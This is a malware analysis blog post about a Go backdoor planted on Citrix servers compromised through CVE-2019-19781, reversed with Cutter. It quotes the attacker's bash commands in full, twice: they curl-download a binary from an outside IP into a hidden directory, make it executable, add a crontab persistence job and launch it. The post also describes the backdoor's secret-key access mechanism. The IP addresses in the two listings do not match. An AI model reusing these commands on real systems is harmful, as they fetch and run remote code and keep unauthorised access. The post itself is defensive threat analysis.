Please read the disclaimer
After the exploit release of CVE-2019-19781, malicious hackers took the opportunity to compromise Citrix instances that did not have the Citrix mitigation implemented. I had the chance to get my hands on some artefacts from a honey pot of a certain threat actor who compromised multiple servers tweet link, in this post I will talk in details on how I reversed it using Cutter.
Note: the secret key used by the malware was altered by m.
We notice that the threat actor executed the following bash commands on the compromised system:
1 2 3 4 5 6 7 kill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k https://184.108.40.206/wp-content/uploads/2018/09/6b37ab9644fff4d954615c93cc890039 -o /tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * * /var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &;
- It kill all running instances of netscalerd
- It delete the file /var/tmp/netscalerd
- It create the directory /tmp/.init
- It download a binary file from 220.127.116.11 through https request and save it in /tmp/.init/httpd
- It create a cronjob to run /var/nstmp/.nscache/httpd, note: this file is created by the downloaded binary.
Overview of the binary file:
Opening the binary with Cutter reveals that it’s a golang compiled binary composed of multiple functions mainly:
if the current process CWD do not contain the string .nscache/httpd it start /var/nstmp/.nscache/httpd as new process then it exit, else it run 2 other threads:
It create a directory /var/nstmp/.nscache
check if the file /var/nstmp/.nscache/httpd already exist
if not, it copy it self to /var/nstmp/.nscache/httpd
It continuously read the directory /netscaler/portal/scripts
then loops through all the files contained in that directory, by checking if they were created in the last 14 days
if yes, it proceed to doFile function
It first check if the file name contains a special 32 bytes long string (secret key)
In the case where it does not, it continue by checking if the content of the file contains the strings block or BLOCK if it does, the file will be deleted unless it also contains the secret key.
Is for some reasons … empty.
Start a UDP listener on *:18634 then it keep listening on that port, without using the data received.
It continuously scan the directory /netscaler/portal/templates for *.xml files, then call doFile function. In other words every xml file that contain the string block or BLOCK will be deleted unless the content/file name contain the secret key.
From my understanding, the author’s goal was to stop other malicious hackers from exploiting and gaining access to the Citrix instance by deleting every uploaded xml file, while retaining access to himself, indeed with that 32 bytes long string which serves as a secret key, only the author of this malware can gain access to the compromised server.
- UDP listener
- Bash history
- kill -9 netscalerd;
- rm /var/tmp/netscalerd;
- mkdir /tmp/.init;
- curl -k https://18.104.22.168/wp-content/uploads/2018/09/6b37ab9644fff4d954615c93cc890039 -o /tmp/.init/httpd;
- chmod 744 /tmp/.init/httpd;
- echo “* * * * * /var/nstmp/.nscache/httpd” | crontab -;
- /tmp/.init/httpd &;